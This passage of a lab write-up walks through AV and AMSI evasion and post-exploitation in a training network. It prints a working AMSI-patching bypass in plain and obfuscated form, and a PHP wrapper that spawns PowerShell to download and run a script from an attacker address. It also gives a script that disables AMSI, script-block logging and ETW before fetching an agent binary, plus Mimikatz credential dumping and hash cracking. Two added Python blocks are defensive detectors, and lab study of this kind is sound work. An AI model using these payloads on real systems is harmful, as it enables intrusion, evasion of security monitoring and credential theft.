To aid in our obfuscation efforts, we will use the AMSITrigger script – https://github.com/RythmStick/AMSITrigger, written by RythmStick. This script will take a given PowerShell script and test each unique string within it against AMSI to identify which strings are being used to flag the script as malicious. This will only test against AMSI and not Defender; we will go over obfuscating for Defender in a later task; however, for this task, we only need to worry about AMSI since everything is file-less (mostly).
AMSI will also utilize regex to aggregate risk assessment; this means that no one individual string might be flagged rather an entire code block. This can be painful for us to obfuscate and require other techniques like encoding, type acceleration, and run-time decoding.
To use AMSITrigger, we only need to specify two parameters: -u, --url or -i, --inputfile, and -f, --format. Find example syntax below.
Syntax: .\AMSITrigger.exe -u <URL> -f 1
or .\AMSITrigger.exe -i <file> -f 1
- Above is the output from AMSITrigger.exe on the script from the previous task… you can also use -f 3 to visualize where the bad code block is within the source code.
String Concatenation
The first method of manual obfuscation we will look at is string concatenation.
There are several methods of string concatenation and other techniques that we can use to break signatures. Find an outline of the different methods below.
- Concatenate – ('co'+'ffe'+'e')
- Reorder – ('{1}{0}'-f'ffee','co')
- Whitespace – ( 'co' +'fee' + 'e')
String manipulation will usually break single-string weak signatures; as previously explained, AMSI can also use regex to aggregate its risk assessment. Against regex signatures we will need to use more advanced techniques like encoding and type acceleration, found below.
Type Acceleration
The second method of manual obfuscation we will look at is type acceleration. From the Microsoft documentation, "Type accelerators are aliases for .NET framework classes. They allow you to access specific .NET framework classes without having to type the full class name explicitly. For example, you can shorten the AliasAttribute class from [System.Management.Automation.AliasAttribute] to [Alias]." https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.core/about/about_type_accelerators?view=powershell-7.1
We can abuse type accelerators to modify malicious types and break the signatures of types. For example, you can use PowerShell to create your own PSObject and type accelerator to be used in place of the malicious type and, in turn, break the AMSI signature.
This may seem like an intimidating topic at first, but we can break it down into two lines of code to make it easier to understand.
- To create a type accelerator, we will first need to declare a PSObject in Assembly to retrieve the type.
  [PSObject].Assembly.GetType
- We will then need to add our malicious type to System.Management.Automation.TypeAccelerators. This will allow us to use the type accelerator as a separate type from the malicious type. Find example code below.
  ("System.Management.Automation.TypeAccelerators")::Add('dorkstork', [system.runtime.interopservices.marshal])
- We can combine these two code snippets to create a final PSObject containing the newly created type.
  [PSObject].Assembly.GetType("System.Management.Automation.TypeAccelerators")::Add('dorkstork', [system.runtime.interopservices.marshal])
- We can then replace the PSObject at the location of the malicious type. Find a comparison of the new and old code below.
  Old: [system.runtime.interopservices.marshal]::copy($buf, 0, $BufferAddress, 6);
  New: [dorkstork]::copy($buf, 0, $BufferAddress, 6);
Now we have a newly created type accelerator that will break the signature attached to it.
For more information about creating type accelerators within PowerShell, check out this blog, https://community.idera.com/database-tools/powershell/powertips/b/tips/posts/adding-new-type-accelerators-in-powershell
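The defender-side counterpart of the two techniques above, as an added example that is not part of the original write-up, the Holo room, or AMSITrigger: a small Python normaliser that folds PowerShell string concatenation and -f reorder expressions back into single literals before matching the weak strings listed earlier (AmsiScanBuffer, amsiInitFailed, AmsiUtils), and that also flags the TypeAccelerators class name once concatenation has reassembled it. It assumes plain single-quoted literals and {n} placeholders only, which is what the snippets above and the Token\String forms produce; the sample script text is constructed. It deliberately does not resolve what an alias such as [dorkstork] refers to, which is exactly why type aliasing defeats a purely string-based signature.

```python
import re

# Weak strings the text above lists as the ones AMSI signatures key on, plus the
# class that the type-accelerator trick registers its alias through. Matching
# against the *normalised* text is the point: the raw script never contains them.
WATCH_TERMS = (
    "AmsiScanBuffer",
    "amsiInitFailed",
    "AmsiUtils",
    "System.Management.Automation.TypeAccelerators",
)

SQ = r"'([^']*)'"  # one single-quoted PowerShell literal (no embedded quotes)

# ('{1}{0}' -f 'ffee','co')  ->  'coffee'     (format-operator reorder)
_FORMAT = re.compile(
    r"\(\s*(['\"])((?:\{\d+\})+)\1\s*-f\s*((?:" + SQ + r"\s*,\s*)*" + SQ + r")\s*\)"
)
# 'co' + 'ffee'  ->  'coffee'                 (concatenation, any whitespace)
_CONCAT = re.compile(SQ + r"\s*\+\s*" + SQ)
# ( 'coffee' )  ->  'coffee'  but not f('x')   (grouping parens, not call parens)
_PAREN = re.compile(r"(?<![\w.\]\)])\(\s*" + SQ + r"\s*\)")


def _fold_format(m):
    order = [int(i) for i in re.findall(r"\{(\d+)\}", m.group(2))]
    args = re.findall(SQ, m.group(3))
    if max(order) >= len(args):  # malformed expression: leave it untouched
        return m.group(0)
    return "'" + "".join(args[i] for i in order) + "'"


def normalize(src):
    """Apply the three folds until a fixpoint; inner expressions resolve first."""
    prev = None
    while prev != src:
        prev = src
        src = _FORMAT.sub(_fold_format, src)
        src = _CONCAT.sub(lambda m: "'" + m.group(1) + m.group(2) + "'", src)
        src = _PAREN.sub(lambda m: "'" + m.group(1) + "'", src)
    return src


def flagged_terms(src):
    """Case-insensitive WATCH_TERMS hits in the normalised script text."""
    text = normalize(src).lower()
    return [t for t in WATCH_TERMS if t.lower() in text]


if __name__ == "__main__":
    # Constructed sample in the shape of the page's snippets (not a real script).
    sample = (
        "$ABSD = 'AmsiS'+'canBuffer';\n"
        "[PSObject].Assembly.GetType( ( ('{1}{0}'-f'st','Sy' ) "
        "+'em.Management.Automation.TypeAccelerators' ) )"
    )
    print(normalize(sample))
    print(flagged_terms(sample))
```

This is a static triage aid for scripts pulled from a web server, a log, or a quarantine, not a replacement for AMSI itself: the engine scans the script text as written, which is why the concatenated form slips past a single-string signature, and a regex that aggregates over a whole block is the engine's own answer to the same problem.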
Obfuscated amsi_bypass.ps1
# Inner quotes are backtick-escaped so the C# member definition survives PowerShell string parsing.
$MethodDefinition = "
[DllImport(`"kernel32`")]
public static extern IntPtr GetProcAddress(IntPtr hModule, string procName);
[DllImport(`"kernel32`")]
public static extern IntPtr GetModuleHandle(string lpModuleName);
[DllImport(`"kernel32`")]
public static extern bool VirtualProtect(IntPtr lpAddress, UIntPtr dwSize, uint flNewProtect, out uint lpflOldProtect);
";
$Kernel32 = Add-Type -MemberDefinition $MethodDefinition -Name 'Kernel32' -NameSpace 'Win32' -PassThru;
$ABSD = 'AmsiS'+'canBuffer';
$handle = [Win32.Kernel32]::GetModuleHandle('amsi.dll');
[IntPtr]$BufferAddress = [Win32.Kernel32]::GetProcAddress($handle, $ABSD);
[UInt32]$Size = 0x5;
[UInt32]$ProtectFlag = 0x40;
[UInt32]$OldProtectFlag = 0;
[Win32.Kernel32]::VirtualProtect($BufferAddress, $Size, $ProtectFlag, [Ref]$OldProtectFlag);
$buf = [Byte[]]([UInt32]0xB8,[UInt32]0x57, [UInt32]0x00, [UInt32]0x07, [UInt32]0x80, [UInt32]0xC3);
[PSObject].Assembly.GetType("System.Management.Automation.TypeAccelerators")::Add('d1kst1k', [system.runtime.interopservices.marshal])
[d1kst1k]::copy($buf, 0, $BufferAddress, 6);
Further Reading…
For more information about manual obfuscation and AMSI obfuscation, check out the following resources.
- https://amsi.fail/
- https://s3cur3th1ssh1t.github.io/Bypass_AMSI_by_manual_modification/
- https://0x00-0x00.github.io/research/2018/10/28/How-to-bypass-AMSI-and-Execute-ANY-malicious-powershell-code.html
- https://www.youtube.com/watch?v=lP2KF7_Kwxk
- https://www.youtube.com/watch?v=F_BvtXzH4a4
Task 33 – AV Evasion – JU57 0BFU$C47E 1T
Obfuscating AMSI bypass code
Invoke-Obfuscation (https://github.com/danielbohannon/Invoke-Obfuscation) is a utility built by Daniel Bohannon and Cobbr. It is used to take a series of arguments/obfuscation tokens and automatically obfuscate provided code. From their GitHub, "Invoke-Obfuscation is a PowerShell v2.0+ compatible PowerShell command and script obfuscator.". Red teamers can use obfuscation to make reverse engineering/analysis harder and, in some cases, bypass anti-virus and other detections.
Invoke-Obfuscation syntax can seem very large and scary at first if you don’t understand how it breaks down the obfuscation tokens. We can follow along with this guide created by the author of Invoke-Obfuscation to get familiar with the syntax – https://www.danielbohannon.com/blog-1/2017/12/2/the-invoke-obfuscation-usage-guide.
To begin our obfuscation attempts, we will need to set the script block or the payload we want to obfuscate and then specify tokens to use. Invoke-Obfuscation offers both an argument parsing command-line tool as well as a friendly CLI. For our purposes, we will be using the command line. We will only be covering an example of using a token to bypass anti-virus, creating a token command, and the various use cases are out of scope for this task.
Below is the command we will use to obfuscate our payload. The token command used at the time of writing will bypass anti-virus for some payloads or tools. We will be breaking this command down later in this task.
Invoke-Obfuscation -ScriptPath C:\Path\To\powershell_script.ps1 -Command 'Token\String\1,2,Token\Variable\1,Token\Whitespace\1' -Quiet -NoExit
To break it down:
- -ScriptPath points to the PowerShell script to obfuscate. -ScriptBlock {'<PAYLOAD>'} will also work for obfuscating scripts or commands directly.
- -Command is where we string together our obfuscation commands:
  - Token\String\1 relates to the first string obfuscation under the token section… it simply concatenates the string. Below is a screenshot of the output of STRING in the CLI:
  - 2 relates to the 2nd option in the screenshot above, Reorder – if you do not supply the full ‘path’ to the next obfuscation command (e.g. Token\String\2) it will append the path from the previous command depending on what is missing…
  - Token\Variable\1 relates to the 1st VARIABLE type of TOKEN, and will . As mentioned above, since we left off Token\ it has appended it from the previous command:
  - Token\Whitespace\1 adds random whitespaces between the concatenation:
- -Quiet simply makes the output less verbose
- -NoExit ensures that you don’t exit from Invoke-Obfuscation‘s CLI after it has obfuscated the code to your liking.
Further Obfuscated amsi_bypass.ps1
${methODdEfiNITion} = (' ' + ' ' + ' '+' ' + ' ' + ("[DllImport(`"kernel32`")] "+ '') + ' '+' ' + ' ' + 'p' + ( "{1}{0}"-f 'ic ','ubl' ) + 'st'+ ( "{1}{0}" -f'c ','ati') +( "{0}{1}"-f 'ext','ern' ) +' '+ 'Int' + ( "{0}{1}"-f 'P','tr ' ) + ("{0}{1}"-f 'G','etPr' )+'oc' +'Ad'+ 'dre'+ 's'+ 's'+( ( ("{2}{0}{1}"-f'r',' ','(IntPt' ) )) + ( "{1}{0}"-f 'od','hM' )+ ("{1}{0}" -f'e,','ul') +' '+ ("{1}{0}" -f 'tri','s') +'n','am','ro' +'cN' + ((( "{1}{0}{2}"-f 'e); ') ) ) + ' '+' '+' ' + ' ' + ' ' + ( "[DllImport(`"kernel32`")] " + '' )+ ' '+ ' ' +' '+ 'pu'+'b' + ("{0}{1}" -f'lic',' ' )+'st' + ( "{1}{0}"-f 'c ','ati')+'ext' +'er' +'n '+ 'In' + ( "{0}{1}" -f'tP','tr ' ) + ("{1}{0}" -f'ule','GetMod' )+ ( "{0}{1}"-f'Ha','ndl' )+ 'e(s' +("{1}{0}"-f'ng','tri' )+' ' + 'lpM' +( "{0}{1}"-f 'odu','leN' ) + 'a' + 'm' + 'e'+ ( (( "{1}{2}{0}"-f' ',');',' ') )) + ' ' +' '+' ' + ( "[DllImport(`"kernel32`")] "+'' ) + ' '+' '+' '+ 'pub'+ ("{0}{1}" -f 'lic',' ' ) + 'sta' +("{1}{0}" -f ' ','tic' )+'ex'+ ( "{0}{1}"-f'ter','n ' ) + 'b'+( "{0}{1}"-f'o','ol ' ) +( "{1}{0}" -f'u','Virt' ) +'al' + ( "{2}{0}{1}"-f'ot','ec','Pr')+ (( ( "{1}{0}" -f 'IntP','t(' )) ) + 'tr ' +( "{0}{2}{1}"-f'lpA','es','ddr') +'s,' + ' '+'U' +( "{0}{1}"-f'In','tP' )+ 'tr '+'d' +("{0}{1}" -f 'wSiz','e,' )+ ' ' +'u' +( "{0}{1}"-f 'int',' ') + 'f'+ ( "{2}{1}{0}" -f'ot','Pr','lNew' ) + ("{1}{0}"-f',','ect') + ' ' +'out' + ' '+ 'uin'+ 't '+ 'l'+ ( "{0}{1}" -f 'pflO','ldP' ) + ( ( ( "{1}{0}{2}"-f 'ect)','rot',';') ) ) +' ' ) ;
${keRNEl32} = Add-Type -MemberDefinition ${METhODdEfINI`TioN} -Name ('K'+ 'ern' +( "{1}{0}" -f'2','el3') ) -NameSpace (("{0}{1}" -f'Win','3' )+ '2' ) -PassThru ;
${a`BSd} = ( 'Ams'+'iS' ) + ( 'ca'+'nB' + ( "{0}{1}"-f'uffe','r' ) );
${HAnDLe} = [Win32.Kernel32]::GetModuleHandle( ( 'a'+( "{2}{0}{1}"-f '.d','ll','msi' )) );
[IntPtr]${BufFErADDREss} = [Win32.Kernel32]::GetProcAddress( ${HANdle}, ${Ab`SD}) ;
[UInt32]${S`iZE} = 0x5;
[UInt32]${pROTECTFlAg} = 0x40;
[UInt32]${oldpROTEcTFlAg} = 0;
[Win32.Kernel32]::VirtualProtect( ${BuFFerADDreSS}, ${SizE}, ${prOTeCTFLAg}, [Ref]${oLdproTEC`TFlag} ) ;
${b`Uf} = [Byte[]]( [UInt32]0xB8,[UInt32]0x57, [UInt32]0x00, [Uint32]0x07, [Uint32]0x80, [Uint32]0xC3 ) ;
[PSObject].Assembly.GetType( ( ("{1}{0}"-f'st','Sy' ) +'em'+'.Ma' + ("{0}{1}"-f'nage','m' )+ 'ent' +'.A' +'uto' +("{0}{1}" -f 'mation.T','y') +'p'+'eA' + 'cc'+ 'e' + ("{0}{1}" -f'l','era' )+ ( "{1}{0}" -f's','tor' ) ) )::Add( (( "{0}{1}"-f 'd','1ks')+'t1k' ), [system.runtime.interopservices.marshal] )
[d1kst1k]::copy( ${BUf}, 0, ${bUffeRAdDR`Ess}, 6) ;
Task 34 – AV Evasion – ‘Ca’ + ‘n’ + ‘you’ + ‘ ‘ + ‘see’ + ‘me now’ + ‘?’
Bypassing Defender and AV
As new EDR solutions and prevention methods are released, we as red teamers need to change and evolve our TTPs to work around the ever-growing blue team. Often, the techniques themselves don’t change, but scripts and solutions like https://github.com/IonizeCbr/AmsiPatchDetection and other indicators can make it harder to get our payloads and tools past even when bypassed and obfuscated, or we have other restrictions in place we need to work around. In this case, we can use code analysis and manual code review to break signatures. A few tools can help us along the way with code analysis, including ThreatCheck (https://github.com/rasta-mouse/ThreatCheck) and DefenderCheck (https://github.com/matterpreter/DefenderCheck). Both of these tools will ingest a given file and output the found bytes attached to signatures.
ThreatCheck
ThreatCheck has a small argument list, and syntax is relatively straightforward. Find a list of arguments and a syntax example below.
- -e or --engine (AMSI or Defender)
- -f or --file
- -u or --url
Syntax: ThreatCheck.exe -f <file>
In this task, we will be focusing on analyzing the Covenant source code; however, ThreatCheck can be used on any tools or payloads you need to clean.
Below you will find an example of the first bad byte that ThreatCheck will discover. ThreatCheck will aggregate bytes based on their signature strength, the lowest being the strongest signature and what you should prioritize breaking.
STOP THE PRESS – Covenant is NOT for us.
OK, so it was about this point that I discovered that Covenant was not going to be the solution for this task in this day and age. I am sure that with enough manual tweaking you could potentially get anything working… but I didn’t want to have to manually re-write each Grunt and then obfuscate it with an outside utility (and there aren’t many that were even successful against the new Defender). So I turned my attention back to Empire, which is still to this day being developed and updated.
I tried a range of C# agents and modifications to get it to work and the best I could achieve was undetectable using C# obfuscators that were… well, not "free". Not wanting to have to use paid tools to complete the task, I decided that finding another method was best.
So I turned back to the old faithful multi/launcher powershell variant, and with a bit of tweaking to the setup I managed to get it to produce a payload that bypasses AMSI, ScriptBlockLog and ETW, with the right level of obfuscation to trick a current-day install of Windows 10 into running an agent. Here is the configuration:
usestager multi/launcher
set Listener <YOUR_HTTP_LISTENER>
set Base64 False
set Bypasses liberman scriptblocklog etw
set Obfuscate True
set ObfuscateCommand Token\String\2,Token\Command\2,Token\Argument\3,Token\Member\3,Token\Variable\1,Token\Type\2
Although when running the outputted script it will produce errors (and may not work the first time ran), this will still get us the initial foothold.
(first line was the initial attempt, second line is the successful connection)
But what about SharpEDRChecker?!
Yeah… about that…
The new BC-Security builds of Empire use the same Roslyn compiler method to build and send copies of C# apps to agents on the fly that Covenant uses, taken directly from Covenant itself… This meant that it should be relatively easy to port it over to Empire right?
I managed to somewhat integrate SharpEDRChecker into the Empire csharp module. I had to manually copy System.Xml.Linq.dll from my Win10 development box into /opt/Empire/empire/server/csharp/Covenant/Data/AssemblyReferences/net40.
Also, the task does NOT explain how to build the required YAML project file for SharpEDRChecker… so I had to research and build my own.
- Name: SharpEDRChecker
  Aliases: []
  Description: C# application that checks for AV and EDR on target.
  Author:
      Name: stimpz0r
      Handle: stimpz0r
      Link: http://stimpz0r.com
  Help:
  Language: CSharp
  CompatibleDotNetVersions:
  - Net40
  Code: |
    using System;
    using System.IO;
    using System.Reflection;
    using SharpEDRChecker;
    public static class Task
    {
        public static Stream OutputStream { get; set; }
        public static string Execute(string Command = "")
        {
            try
            {
                TextWriter realStdOut = Console.Out;
                TextWriter realStdErr = Console.Error;
                StreamWriter stdOutWriter = new StreamWriter(OutputStream);
                StreamWriter stdErrWriter = new StreamWriter(OutputStream);
                stdOutWriter.AutoFlush = true;
                stdErrWriter.AutoFlush = true;
                Console.SetOut(stdOutWriter);
                Console.SetError(stdErrWriter);
                string[] args = Command.Split(' ');
                typeof(Program).GetMethod("Main", BindingFlags.NonPublic | BindingFlags.Static).Invoke(null, new object[] { args });
                Console.Out.Flush();
                Console.Error.Flush();
                Console.SetOut(realStdOut);
                Console.SetError(realStdErr);
                OutputStream.Close();
                return "";
            }
            catch (Exception e)
            {
                if (OutputStream != null)
                {
                    OutputStream.Close();
                }
                return e.GetType().FullName + ": " + e.Message + Environment.NewLine + e.StackTrace;
            }
        }
    }
  TaskingType: Assembly
  UnsafeCompile: false
  TokenTask: false
  Options: []
  ReferenceSourceLibraries:
  - Name: SharpEDRChecker
    Description: SharpEDRChecker is a .NET assembly that checks for AV and EDR systems installed on the target.
    Location: SharpEDRChecker\
    Language: CSharp
    CompatibleDotNetVersions:
    - Net40
    ReferenceAssemblies:
    - Name: mscorlib.dll
      Location: net40\mscorlib.dll
      DotNetVersion: Net40
    - Name: Microsoft.CSharp.dll
      Location: net40\Microsoft.CSharp.dll
      DotNetVersion: Net40
    - Name: System.dll
      Location: net40\System.dll
      DotNetVersion: Net40
    - Name: System.Core.dll
      Location: net40\System.Core.dll
      DotNetVersion: Net40
    - Name: System.Data.dll
      Location: net40\System.Data.dll
      DotNetVersion: Net40
    - Name: System.Data.DataSetExtensions.dll
      Location: net40\System.Data.DataSetExtensions.dll
      DotNetVersion: Net40
    - Name: System.Management.dll
      Location: net40\System.Management.dll
      DotNetVersion: Net40
    - Name: System.ServiceProcess.dll
      Location: net40\System.ServiceProcess.dll
      DotNetVersion: Net40
    - Name: System.XML.dll
      Location: net40\System.XML.dll
      DotNetVersion: Net40
    - Name: System.Xml.Linq.dll
      Location: net40\System.Xml.Linq.dll
      DotNetVersion: Net40
    EmbeddedResources: []
  ReferenceAssemblies: []
  EmbeddedResources: []
Unfortunately, even after all that, the agent will run the task, but never returns anything… this is also true with built-in csharp modules such as Seatbelt (which uses an identical method)… this COULD be Defender blocking the downloaded apps… but more likely that it is just broken.
Both Covenant and Empire also use ConfuserEx to obfuscate the compiled binaries – that not only breaks other obfuscation, but does not stop Defender finding the binary at all… it leaves the variables / strings in plain text for the world (and Defender) to see. I ended up disabling it in the Empire source code and using another (non-free) obfuscator to hide the agents from Defender.
Task 35 – AV Evasion – Wrapping the burrito
This task basically covers building a PHP wrapper to use on S-SRV01 to upload and execute the payload… since I opted for an Empire powershell payload, instead of breaking it down into two commands like the task shows, I will do it in one.
The below uses Invoke-Webrequest (or IWR) to download the obfuscated script then starts the Empire agent via IEX (Invoke-Expression). This will leave the .ps1 script on the target machine… (perhaps I should have added on a rm?)
NOTE: I took this to a new level for mine… well, in the sense that no matter how hard I tried, I could not get the powershell stager to work… so I switched to using a 2 stage powershell/C# loader (which was probably overkill)
CODE >> stage0.php
<?php
function stage0() {
$init = "powershell.exe -nop -sta -ep bypass";
$payload = "IEX(New-Object Net.WebClient).downloadString('http://10.50.107.119:9090/9x.ps1')";
$execution_command = "shell_exec";
$query = $execution_command("$init $payload");
echo $query;
}
stage0();
die();
?>
CODE >> stage1.ps1 (semi-obfuscated)
- Final variant was obfuscated with Invoke-Obfuscation:
- Token\String\1
- Token\Type\1
- Token\Variable\1
- Token\Argument\2
- Token\Command\1
- Token\Member\2
- String\3
The below has minor obfuscation, the very first variable being something I modified the source of Empire to achieve as it was causing issues with AMSI.
This script not only creates an AMSI bypass, but a ScriptBlockLogging and ETW bypass to boot. It then downloads and executes an obfuscated binary that starts the Empire agent.
If(${PSVerSIonTaBLe}.PSVeRsIoN.MajoR -GE 3){$MethodDefinition = "[DllImport(`"kernel32`")]public static extern IntPtr GetProcAddress(IntPtr hModule, string procName);[DllImport(`"kernel32`")]public static extern IntPtr GetModuleHandle(string lpModuleName);[DllImport(`"kernel32`")]public static extern bool VirtualProtect(IntPtr lpAddress, UIntPtr dwSize, uint flNewProtect, out uint lpflOldProtect);";$Kernel32 = Add-Type -MemberDefinition $MethodDefinition -Name 'Kernel32' -NameSpace 'Win32' -PassThru;$ABSD = 'AmsiS'+'canBuffer';$handle = [Win32.Kernel32]::GetModuleHandle('amsi.dll');[IntPtr]$BufferAddress = [Win32.Kernel32]::GetProcAddress($handle, $ABSD);[UInt32]$Size = 0x5;[UInt32]$ProtectFlag = 0x40;[UInt32]$OldProtectFlag = 0;[Win32.Kernel32]::VirtualProtect($BufferAddress, $Size, $ProtectFlag,[Ref]$OldProtectFlag);$buf = [Byte[]]([UInt32]0xB8,[UInt32]0x57,[UInt32]0x00,[Uint32]0x07,[Uint32]0x80,[Uint32]0xC3);[system.runtime.interopservices.marshal]::copy($buf, 0,$BufferAddress, 6);
$11Bd8=[ReF].AsSEmBly.GetTYpE('System.Management.Automation.Utils')."GeTFiELd"('cachedGroupPolicySettings','N'+'onPublic,Static');IF($11bd8){$A18E1=$11bD8.GEtValuE($NULL);If($A18e1['ScriptB'+'lockLogging']){$a18e1['ScriptB'+'lockLogging']['EnableScriptB'+'lockLogging']=0;$A18e1['ScriptB'+'lockLogging']['EnableScriptBlockInvocationLogging']=0}$VaL=[COlLECtIONS.GeNeRiC.DictIoNARY[STRIng,SysTEM.ObJEct]]::NEw();$vaL.AdD('EnableScriptB'+'lockLogging',0);$VaL.AdD('EnableScriptBlockInvocationLogging',0);$A18E1['HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\PowerShell\ScriptB'+'lockLogging']=$Val}ELSE{[SCrIpTBLoCK]."GEtFIeld"('signatures','N'+'onPublic,Static').SETValue($NuLl,(NEw-OBJect ColleCTionS.GenErIc.HAsHSET[StRiNg]))}
[System.Diagnostics.Eventing.EventProvider]."GetField"('m_e'+'nabled','Non'+'Public,'+'Instance').SetValue([Ref].Assembly.GetType('Syste'+'m.Management.Automation.Tracing.PSE'+'twLogProvider')."GetField"('et'+'wProvider','NonPub'+'lic,S'+'tatic').GetValue($null),0);};
Invoke-WebRequest http://10.50.107.119:9090/s2.exe -OutFile s2.exe; .\s2.exe
s2.exe was an Empire C# agent, obfuscated using a non-freeware obfuscator.
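The detection side of the stage0.php / stage1.ps1 chain above, as an added example that is not part of the original write-up, the Holo room, or Empire. The wrapper makes the web server's own process spawn powershell.exe with -nop and -ep bypass followed by a download cradle, and that parent/child relationship plus those switches is visible in process-creation telemetry no matter how the script body itself is obfuscated. The records are constructed in Sysmon Event ID 1 field naming (Image, ParentImage, CommandLine) and are not real telemetry from the lab; the set of web-server parent process names and the two-signal threshold are assumptions to tune for your own estate.

```python
import re

# Constructed process-creation records in Sysmon Event ID 1 field naming
# (Image, ParentImage, CommandLine); not real telemetry from the lab. The first
# is what stage0.php above makes the web server do; the others are routine.
SAMPLE_PROCESSES = [
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\xampp\apache\bin\httpd.exe",
     "CommandLine": "powershell.exe -nop -sta -ep bypass "
                    "IEX(New-Object Net.WebClient).downloadString('http://10.50.107.119:9090/9x.ps1')"},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "powershell.exe"},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\System32\svchost.exe",
     "CommandLine": r"powershell.exe -ExecutionPolicy Bypass -File C:\Scripts\inventory.ps1"},
]

# Assumed list of web-server / PHP host process names; extend for your estate.
WEB_SERVER_PARENTS = {"w3wp.exe", "httpd.exe", "php-cgi.exe", "php.exe", "nginx.exe"}

# Command-line switches and cradle fragments that stage0.php / stage1.ps1 rely on.
RISKY_ARGS = {
    "exec_policy_bypass": re.compile(r"-e\w*\s+bypass", re.I),   # -ep / -ExecutionPolicy Bypass
    "no_profile": re.compile(r"-nop(rofile)?\b", re.I),          # -nop / -NoProfile
    "download_cradle": re.compile(
        r"downloadstring|downloadfile|net\.webclient|invoke-webrequest|\biwr\b", re.I),
}


def _basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def score_process(event):
    """Reasons a process-creation record looks like a web-shell-launched PowerShell
    session; an empty list means nothing to flag."""
    if _basename(event["Image"]) not in ("powershell.exe", "pwsh.exe"):
        return []
    reasons = []
    parent = _basename(event["ParentImage"])
    if parent in WEB_SERVER_PARENTS:
        reasons.append("parent is web server process " + parent)
    for name, pattern in RISKY_ARGS.items():
        if pattern.search(event["CommandLine"]):
            reasons.append(name)
    return reasons


def triage(events, min_reasons=2):
    """Records carrying at least `min_reasons` independent signals, with those signals."""
    hits = []
    for e in events:
        reasons = score_process(e)
        if len(reasons) >= min_reasons:
            hits.append({"command": e["CommandLine"], "reasons": reasons})
    return hits


if __name__ == "__main__":
    for hit in triage(SAMPLE_PROCESSES):
        print(hit)
```

Requiring two independent signals keeps a lone -ExecutionPolicy Bypass from a scheduled admin script below the threshold, while a web-server parent on its own is already worth a look; note that the Invoke-Obfuscation output from Task 33 never enters into this check at all, which is the point of looking at launch context rather than script text.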
Task 36 – Post Exploitation – That’s not a cat that’s a dawg
This task shows the steps on how to execute Mimikatz via Covenant… since I am not using Covenant (for reasons previously mentioned) I have instead shown the steps below for running Mimikatz via the csharp/Sharpsploit.Credentials/Mimikatz module in Empire.
ENUM >> Mimikatz (via Empire)
(Empire: S5AT6TXN) > usemodule csharp/Sharpsploit.Credentials/Mimikatz
[*] Set Agent to S5AT6TXN
Author cobbr_io
Background False
Description Execute a mimikatz command.
Language csharp
Name csharp/Sharpsploit.Credentials/Mimikatz
NeedsAdmin False
OpsecSafe False
┌Record Options─┬──────────────────────────┬──────────┬─────────────────────────────────┐
│ Name │ Value │ Required │ Description │
├───────────────┼──────────────────────────┼──────────┼─────────────────────────────────┤
│ Agent │ S5AT6TXN │ True │ Agent to run module on. │
├───────────────┼──────────────────────────┼──────────┼─────────────────────────────────┤
│ Command │ sekurlsa::logonPasswords │ True │ Mimikatz command to execute. │
├───────────────┼──────────────────────────┼──────────┼─────────────────────────────────┤
│ DotNetVersion │ Net35 │ True │ .NET version to compile against │
└───────────────┴──────────────────────────┴──────────┴─────────────────────────────────┘
(Empire: usemodule/csharp/Sharpsploit.Credentials/Mimikatz) > set Command privilege::debug token::elevate sekurlsa::logonpasswords
[*] Set Command to privilege::debug token::elevate sekurlsa::logonpasswords
(Empire: usemodule/csharp/Sharpsploit.Credentials/Mimikatz) > execute
[*] Tasked S5AT6TXN to run Task 55
[*] Task 55 results received
.#####. mimikatz 2.2.0 (x64) #19041 Jun 9 2021 18:55:28
.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \ ## /*** Benjamin DELPY 'gentilkiwi' ( benjamin@gentilkiwi.com )
## \ / ## > https://blog.gentilkiwi.com/mimikatz
'## v ##' Vincent LE TOUX ( vincent.letoux@gmail.com )
'#####' > https://pingcastle.com / https://mysmartlogon.com ***/
mimikatz(powershell) # privilege::debug
Privilege '20' OK
mimikatz(powershell) # token::elevate
Token Id : 0
User name :
SID name : NT AUTHORITY\SYSTEM
668 {0;000003e7} 1 D 21315 NT AUTHORITY\SYSTEM S-1-5-18 (04g,21p) Primary
-> Impersonated !
* Process Token : {0;000003e7} 0 D 1069076 NT AUTHORITY\SYSTEM S-1-5-18 (04g,28p) Primary
* Thread Token : {0;000003e7} 1 D 1284062 NT AUTHORITY\SYSTEM S-1-5-18 (04g,21p) Impersonation (Delegation)
mimikatz(powershell) # sekurlsa::logonpasswords
Authentication Id : 0 ; 284199 (00000000:00045627)
Session : Interactive from 1
User Name : watamet
Domain : HOLOLIVE
Logon Server : DC-SRV01
Logon Time : 1/27/2022 4:36:17 AM
SID : S-1-5-21-471847105-3603022926-1728018720-1132
msv :
[00000003] Primary
* Username : watamet
* Domain : HOLOLIVE
* NTLM : <REDACTED>
* SHA1 : <REDACTED>
* DPAPI : <REDACTED>
tspkg :
wdigest :
* Username : watamet
* Domain : HOLOLIVE
* Password : (null)
kerberos :
* Username : watamet
* Domain : HOLO.LIVE
* Password : <REDACTED>
ssp :
credman :
...
CREDS - watamet's NTLM hash
LOOT >> watamet‘s cracked hash (via HashCat)!
❯ hashcat -m 1000 s-srv01_watamet.hash /usr/share/wordlists/rockyou.txt
hashcat (v6.1.1) starting...
OpenCL API (OpenCL 1.2 pocl 1.6, None+Asserts, LLVM 9.0.1, RELOC, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project]
=============================================================================================================================
* Device #1: pthread-Intel(R) Core(TM) i5-6200U CPU @ 2.30GHz, 5121/5185 MB (2048 MB allocatable), 4MCU
Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1
Dictionary cache built:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344392
* Bytes.....: 139921507
* Keyspace..: 14344385
* Runtime...: 1 sec
<REDACTED>:<REDACTED>
Session..........: hashcat
Status...........: Cracked
Hash.Name........: NTLM
Hash.Target......: <REDACTED>
Time.Started.....: Thu Jan 27 17:01:42 2022 (3 secs)
Time.Estimated...: Thu Jan 27 17:01:45 2022 (0 secs)
